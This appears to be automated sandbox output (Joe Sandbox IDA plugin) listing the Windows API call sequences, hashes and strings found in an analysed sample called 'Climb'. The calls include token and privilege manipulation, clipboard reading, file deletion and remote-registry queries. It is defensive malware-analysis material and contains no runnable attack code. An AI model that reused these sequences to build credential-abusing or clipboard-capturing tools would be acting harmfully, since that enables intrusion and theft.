                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2191629493-0
                                                                                                                                                                          • Opcode ID: 8861561d150a605e2692448de191a59f4bcff48ed82f682fd17af1e777b6cafd
                                                                                                                                                                          • Instruction ID: 1784ba7bfb479c81808e04f5fe72d7a59fd601e73f11ec8938a2c3f99e77b727
                                                                                                                                                                          • Opcode Fuzzy Hash: 8861561d150a605e2692448de191a59f4bcff48ed82f682fd17af1e777b6cafd
                                                                                                                                                                          • Instruction Fuzzy Hash: 9EF08C367002108FCB14EF58E845BEEB7E9AF98360F048419F90A9B362CB70BC41CB90
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00112010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0011205A
                                                                                                                                                                            • Part of subcall function 00112010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00112087
                                                                                                                                                                            • Part of subcall function 00112010: GetLastError.KERNEL32 ref: 00112097
                                                                                                                                                                          • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00111BD2
                                                                                                                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00111BF4
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00111C05
                                                                                                                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00111C1D
                                                                                                                                                                          • GetProcessWindowStation.USER32 ref: 00111C36
                                                                                                                                                                          • SetProcessWindowStation.USER32(00000000), ref: 00111C40
                                                                                                                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00111C5C
                                                                                                                                                                            • Part of subcall function 00111A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00111B48), ref: 00111A20
                                                                                                                                                                            • Part of subcall function 00111A0B: CloseHandle.KERNEL32(?,?,00111B48), ref: 00111A35
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                          • String ID: $default$winsta0
                                                                                                                                                                          • API String ID: 22674027-1027155976
                                                                                                                                                                          • Opcode ID: abab380d6fc340d23c092a92556a816af364b2a08c30c05826b8c3d8cfd53b44
                                                                                                                                                                          • Instruction ID: 6bff818ed4c4e3929451e2ef76c114cddaecc5c082121e3e4423b5f134acb782
                                                                                                                                                                          • Opcode Fuzzy Hash: abab380d6fc340d23c092a92556a816af364b2a08c30c05826b8c3d8cfd53b44
                                                                                                                                                                          • Instruction Fuzzy Hash: 80818D75A00209BFDF159FA4EC49FEEBBB9FF09304F144129FA14A62A0D7718995CB60
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00111A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00111A60
                                                                                                                                                                            • Part of subcall function 00111A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,001114E7,?,?,?), ref: 00111A6C
                                                                                                                                                                            • Part of subcall function 00111A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001114E7,?,?,?), ref: 00111A7B
                                                                                                                                                                            • Part of subcall function 00111A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001114E7,?,?,?), ref: 00111A82
                                                                                                                                                                            • Part of subcall function 00111A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00111A99
                                                                                                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00111518
                                                                                                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0011154C
                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00111563
                                                                                                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 0011159D
                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001115B9
                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 001115D0
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 001115D8
                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 001115DF
                                                                                                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00111600
                                                                                                                                                                          • CopySid.ADVAPI32(00000000), ref: 00111607
                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00111636
                                                                                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00111658
                                                                                                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0011166A
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00111691
                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00111698
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001116A1
                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 001116A8
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001116B1
                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 001116B8
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 001116C4
                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 001116CB
                                                                                                                                                                            • Part of subcall function 00111ADF: GetProcessHeap.KERNEL32(00000008,001114FD,?,00000000,?,001114FD,?), ref: 00111AED
                                                                                                                                                                            • Part of subcall function 00111ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,001114FD,?), ref: 00111AF4
                                                                                                                                                                            • Part of subcall function 00111ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,001114FD,?), ref: 00111B03
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4175595110-0
                                                                                                                                                                          • Opcode ID: 9cfeece697754cacb15294c2c541228b287c591a9c77a5ff070bc48a9cb6574f
                                                                                                                                                                          • Instruction ID: d23e0db91b08477224d76b781635f16a1528b77ec888ec3f457449f7c4d1e9e1
                                                                                                                                                                          • Opcode Fuzzy Hash: 9cfeece697754cacb15294c2c541228b287c591a9c77a5ff070bc48a9cb6574f
                                                                                                                                                                          • Instruction Fuzzy Hash: B0717BB6900209BBDF10DFA5EC44FEEBBB8BF05700F094525FA15A71A0D7719985CBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • OpenClipboard.USER32(0014DCD0), ref: 0012F586
                                                                                                                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0012F594
                                                                                                                                                                          • GetClipboardData.USER32(0000000D), ref: 0012F5A0
                                                                                                                                                                          • CloseClipboard.USER32 ref: 0012F5AC
                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0012F5E4
                                                                                                                                                                          • CloseClipboard.USER32 ref: 0012F5EE
                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0012F619
                                                                                                                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0012F626
                                                                                                                                                                          • GetClipboardData.USER32(00000001), ref: 0012F62E
                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0012F63F
                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0012F67F
                                                                                                                                                                          • IsClipboardFormatAvailable.USER32(0000000F), ref: 0012F695
                                                                                                                                                                          • GetClipboardData.USER32(0000000F), ref: 0012F6A1
                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0012F6B2
                                                                                                                                                                          • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0012F6D4
                                                                                                                                                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0012F6F1
                                                                                                                                                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0012F72F
                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0012F750
                                                                                                                                                                          • CountClipboardFormats.USER32 ref: 0012F771
                                                                                                                                                                          • CloseClipboard.USER32 ref: 0012F7B6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 420908878-0
                                                                                                                                                                          • Opcode ID: 220f07ccb312a1a93f349e9ae7e2654db835f5d62b1e432a20d86c687464efbd
                                                                                                                                                                          • Instruction ID: 61470f29905db02efa81cb01724c1f683a931f51486e00534ad9a66bcb4f3ac8
                                                                                                                                                                          • Opcode Fuzzy Hash: 220f07ccb312a1a93f349e9ae7e2654db835f5d62b1e432a20d86c687464efbd
                                                                                                                                                                          • Instruction Fuzzy Hash: 0961AF35204201AFD700EF20E885FAABBB4EF85714F15457DF846876A2DB71ED86CB62
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00127403
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00127457
                                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00127493
                                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001274BA
                                                                                                                                                                            • Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333
                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 001274F7
                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00127524
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                          • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                          • API String ID: 3830820486-3289030164
                                                                                                                                                                          • Opcode ID: abf0e9102770f17242ee038e8ccf73863182b1450559b07778afb70bd92ffb19
                                                                                                                                                                          • Instruction ID: 9f819ba027a4881c07294ef00cd011214ffbb1f2adbc0e028f70e2a171481ef0
                                                                                                                                                                          • Opcode Fuzzy Hash: abf0e9102770f17242ee038e8ccf73863182b1450559b07778afb70bd92ffb19
                                                                                                                                                                          • Instruction Fuzzy Hash: 7BD15C72508344AFC700EB64C885EEBB7ECAF98704F44491DF589D6292EB74DA44CB62
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0012A0A8
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 0012A0E6
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 0012A100
                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0012A118
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0012A123
                                                                                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0012A13F
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0012A18F
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(00177B94), ref: 0012A1AD
                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0012A1B7
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0012A1C4
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0012A1D4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                          • API String ID: 1409584000-438819550
                                                                                                                                                                          • Opcode ID: ee28a475ea1cd9e9b427e5e7a7265ab463a293ffc7a964cb8cc340f08dd8487e
                                                                                                                                                                          • Instruction ID: c5690eb6f2f94ead546846085cebb4abaf7c930959309e2a73a9d4addf1618be
                                                                                                                                                                          • Opcode Fuzzy Hash: ee28a475ea1cd9e9b427e5e7a7265ab463a293ffc7a964cb8cc340f08dd8487e
                                                                                                                                                                          • Instruction Fuzzy Hash: E831F3726006296BDF10AFB4FC49EDE73ADAF05330F404195E814E31A0EB70DEA48A65
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00124785
                                                                                                                                                                          • _wcslen.LIBCMT ref: 001247B2
                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 001247E2
                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00124803
                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?), ref: 00124813
                                                                                                                                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0012489A
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 001248A5
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 001248B0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                          • String ID: :$\$\??\%s
                                                                                                                                                                          • API String ID: 1149970189-3457252023
                                                                                                                                                                          • Opcode ID: 4d014bd50ebf838cc77fb60dae115055463e4b0a72c4567dbc9494cedfa5ef8e
                                                                                                                                                                          • Instruction ID: 11a8e4123cda057939705c68c50e0866e26a30ee450d6104d11039ac58c6b833
                                                                                                                                                                          • Opcode Fuzzy Hash: 4d014bd50ebf838cc77fb60dae115055463e4b0a72c4567dbc9494cedfa5ef8e
                                                                                                                                                                          • Instruction Fuzzy Hash: F831C4B5910259ABDF219FA0EC49FEF37BCEF89700F1041B6F509D2161E77096948B24
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0012A203
                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0012A25E
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0012A269
                                                                                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0012A285
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0012A2D5
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(00177B94), ref: 0012A2F3
                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0012A2FD
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0012A30A
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0012A31A
                                                                                                                                                                            • Part of subcall function 0011E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0011E3B4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                          • API String ID: 2640511053-438819550
                                                                                                                                                                          • Opcode ID: e97a7cedb9c98a7f44723b9b953f912a2f1288f9b443a6694d6c1dd1e355abcc
                                                                                                                                                                          • Instruction ID: ef7baccdf7b13c2733d86e7a40a365764d5a82f234c7b5f6d08b6a25e07e12d5
                                                                                                                                                                          • Opcode Fuzzy Hash: e97a7cedb9c98a7f44723b9b953f912a2f1288f9b443a6694d6c1dd1e355abcc
                                                                                                                                                                          • Instruction Fuzzy Hash: E731337250062AAFCF20EFA4FC49EDE77ADAF45320F504195E814E31A0DB71DE95CA61
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0013D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013C10E,?,?), ref: 0013D415
                                                                                                                                                                            • Part of subcall function 0013D3F8: _wcslen.LIBCMT ref: 0013D451
                                                                                                                                                                            • Part of subcall function 0013D3F8: _wcslen.LIBCMT ref: 0013D4C8
                                                                                                                                                                            • Part of subcall function 0013D3F8: _wcslen.LIBCMT ref: 0013D4FE
                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0013C99E
                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0013CA09
                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0013CA2D
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0013CA8C
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0013CB47
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0013CBB4
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0013CC49
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0013CC9A
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0013CD43
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0013CDE2
                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0013CDEF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3102970594-0
                                                                                                                                                                          • Opcode ID: cefc6d4ae1a0ed324186d2b9fc9bf09abba7c416dbca0ad8d1f145c023eee6e2
                                                                                                                                                                          • Instruction ID: eec7623d60a2e62c1dcce54231d8af6b6e396e00b224cdb8e86b0ad0f48aeab4
                                                                                                                                                                          • Opcode Fuzzy Hash: cefc6d4ae1a0ed324186d2b9fc9bf09abba7c416dbca0ad8d1f145c023eee6e2
                                                                                                                                                                          • Instruction Fuzzy Hash: 250261716042009FC714DF28C895E6ABBE5FF89314F19849DF849DB2A2DB31ED46CB91
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000B5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000B55D1,?,?,000F4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 000B5871
                                                                                                                                                                            • Part of subcall function 0011EAB0: GetFileAttributesW.KERNEL32(?,0011D840), ref: 0011EAB1
                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0011D9CD
                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0011DA88
                                                                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0011DA9B
                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 0011DAB8
                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0011DAE2
                                                                                                                                                                            • Part of subcall function 0011DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0011DAC7,?,?), ref: 0011DB5D
                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,?,?), ref: 0011DAFE
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0011DB0F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                          • String ID: \*.*
                                                                                                                                                                          • API String ID: 1946585618-1173974218
                                                                                                                                                                          • Opcode ID: 7c3f0dedb828e267529ac57d79dd98395993e64c0517e88a5007f04536a68e35
                                                                                                                                                                          • Instruction ID: 9151bb12045fa37c160f5a99e6af1d758649498514e6177a222dd91eb71b8579
                                                                                                                                                                          • Opcode Fuzzy Hash: 7c3f0dedb828e267529ac57d79dd98395993e64c0517e88a5007f04536a68e35
                                                                                                                                                                          • Instruction Fuzzy Hash: 91615E3190510DAFCF09EBE0E992DEDB7B5AF15304F2040A9E442771A2EB756F89CB61
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
